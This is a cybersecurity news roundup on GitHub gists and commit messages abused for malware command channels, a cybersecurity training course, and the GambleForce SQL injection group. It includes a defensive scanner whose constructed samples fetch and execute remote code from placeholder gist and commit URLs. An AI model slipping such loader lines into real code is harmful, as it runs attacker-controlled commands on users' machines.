Hackers Get Crafty with GitHub and More

GitHub, Moonlock's Cybersecuritoons, GambleForce

Good Evening! We're diving into the deep end of the cyber world. First up, we're looking at GitHub, not just for code sharing anymore, but now a playground for savvy hackers using secret gists for nefarious purposes. Then, we'll explore how Moonlock's Cybersecuritoons is changing the cybersecurity education game, making learning about digital threats fun and engaging. Finally, we'll delve into the mysterious GambleForce, a new hacker group targeting the APAC region with SQL injection attacks. So, grab your digital armor and let's decode the latest in the cyber world!

Hackers Get Crafty with GitHub

Cybersecurity is facing a new challenge as hackers increasingly abuse GitHub, a popular open-source development platform, for nefarious purposes. In a recent twist, threat actors are using secret GitHub Gists and git commit messages to issue malicious commands and control compromised hosts. This method of attack is particularly sneaky, blending malicious network traffic with legitimate communications to avoid detection.

ReversingLabs highlighted the growing trend, noting the use of secret gists as a sort of pastebin service. What makes this approach effective is that secret gists are not listed on the author's GitHub profile (though anyone with the URL can still read them), so the command channel is harder to trace back to an account. PyPI packages like httprequesthub and pyhttpproxifier were found containing malicious code that points to these secret gists.

Another technique involves abusing ordinary version control features. Malicious actors embed commands in git commit messages, which the infected package fetches and extracts for execution, as seen in the PyPI package easyhttprequest. The growing sophistication of these methods underscores the need for increased vigilance in cybersecurity.

Trend Watch: While using GitHub for command and control (C2) infrastructure isn't new, the innovative use of features like secret Gists and commit messages for command delivery marks a significant evolution in cyber threats.
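A defender-side illustration of the pattern described above, added here as an example and not code from the article or from ReversingLabs: a small heuristic scanner that flags package source only when a GitHub gist or commits-API endpoint is fetched *and* something executes dynamic content. The sample "package" sources and all URLs are constructed for the demo.

```python
import re

# Indicators of the technique described above (constructed patterns, not the
# exact strings used by the packages named in the article).
GIST_RE = re.compile(r"https?://(?:gist\.github(?:usercontent)?\.com|api\.github\.com/gists)/\S+")
COMMITS_RE = re.compile(r"https?://api\.github\.com/repos/[\w.-]+/[\w.-]+/commits")
FETCH_RE = re.compile(r"\b(?:urlopen|requests\.get|urllib\.request)\b")
EXEC_RE = re.compile(r"\b(?:exec|eval|os\.system|subprocess\.(?:run|Popen|call))\s*\(")


def scan_source(src: str) -> dict:
    """Return which indicators a single source file contains."""
    return {
        "gist": bool(GIST_RE.search(src)),
        "commits_api": bool(COMMITS_RE.search(src)),
        "fetch": bool(FETCH_RE.search(src)),
        "exec": bool(EXEC_RE.search(src)),
    }


def is_suspicious(findings: dict) -> bool:
    """Flag only the combination: a gist/commits endpoint is fetched AND
    dynamic execution is present. A bare gist link (e.g. in docs) is not
    enough on its own, which keeps false positives down."""
    endpoint = findings["gist"] or findings["commits_api"]
    return endpoint and findings["fetch"] and findings["exec"]


# Constructed sample "package" sources for demonstration only.
SAMPLES = {
    "benign_docs": '# See https://gist.github.com/example/abc123 for usage\nprint("hello")\n',
    "gist_loader": (
        "import urllib.request\n"
        'u = "https://gist.githubusercontent.com/example/abc123/raw/cmd.txt"\n'
        "exec(urllib.request.urlopen(u).read())\n"
    ),
    "commit_msg_loader": (
        "import requests, subprocess\n"
        'r = requests.get("https://api.github.com/repos/example/repo/commits")\n'
        'subprocess.run(r.json()[0]["commit"]["message"], shell=True)\n'
    ),
}


def triage(samples: dict = SAMPLES) -> dict:
    """Map each sample name to whether it trips the combined heuristic."""
    return {name: is_suspicious(scan_source(src)) for name, src in samples.items()}
```

Run it over the files of a freshly installed package (setup.py, __init__.py, any post-install hooks) before the code is ever imported; a hit is a reason to inspect, not proof of malice.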

Cybersecurity Goes Edutainment

Moonlock, a cybersecurity division at MacPaw, is revolutionizing the way we approach cybersecurity awareness. Their latest creation, Cybersecuritoons, is a YouTube course designed to make cybersecurity accessible to everyone. This initiative aligns with Moonlock's mission, led by Oleg Stukalenko, to simplify cybersecurity through innovative solutions such as integrating their Moonlock Engine into popular software such as CleanMyMac X.

Human Errors in Cybersecurity: Stress and time pressure lead to human errors, which are the primary cause of security breaches. Tessian's "Psychology of Human Error" report found that 50% of workers made mistakes like sending wrong emails under time pressure. This highlights the critical role of awareness training in preventing financial and reputational damage from cyberattacks.

Shaping Cybersecurity Training: The training market is evolving to meet diverse needs, with expectations to reach $10 billion by 2026. MacPaw's approach involves continuous feedback and adapting training content to suit various levels of expertise. Their IT Security Engineer, Artem Bovtiukh, emphasizes the importance of a feedback culture for the effectiveness of training programs.

Empowering Employees: At MacPaw, security awareness is a collective responsibility. They encourage teams to take dedicated days off for cybersecurity education, addressing the common issue of lack of time for training. This approach not only educates but also aligns with the company's objectives and contributes to professional development.

Looking Ahead: With the rise of short, accessible content like Cybersecuritoons, the future of cybersecurity training is more engaging and effective, catering to different levels of security expertise.

GambleForce: A New Threat in the APAC Region

The cyber world has witnessed the emergence of a new threat, GambleForce, targeting companies in the Asia-Pacific (APAC) region with SQL injection attacks. Group-IB, a cybersecurity firm based in Singapore, has revealed that this previously unknown hacker group has been active since at least September 2023.

Attacking the APAC: GambleForce has been employing basic but effective techniques, including SQL injection and exploiting vulnerabilities in website content management systems (CMS), to steal sensitive information like user credentials. They have targeted organizations in various sectors across countries like Australia, China, India, and South Korea, with six successful attacks out of 24 attempts.

Tools of the Trade: The group primarily uses open-source tools like sqlmap and Cobalt Strike, a legitimate post-exploitation framework, for their attacks. Intriguingly, the version of Cobalt Strike used features commands in Chinese, adding a layer of mystery to the group's origins.

Exploiting Weaknesses: GambleForce's modus operandi involves exploiting public-facing applications through SQL injections and taking advantage of vulnerabilities like CVE-2023-23752 in Joomla CMS. These tactics allow them to bypass authentication protections and access sensitive data.

A Wake-Up Call for Web Security: The activities of GambleForce underscore the importance of secure coding practices and the need for regular software updates to protect against SQL injection attacks. As Nikita Rostovcev, a senior threat analyst at Group-IB, points out, developers often overlook input security and data validation, making web applications vulnerable to such attacks.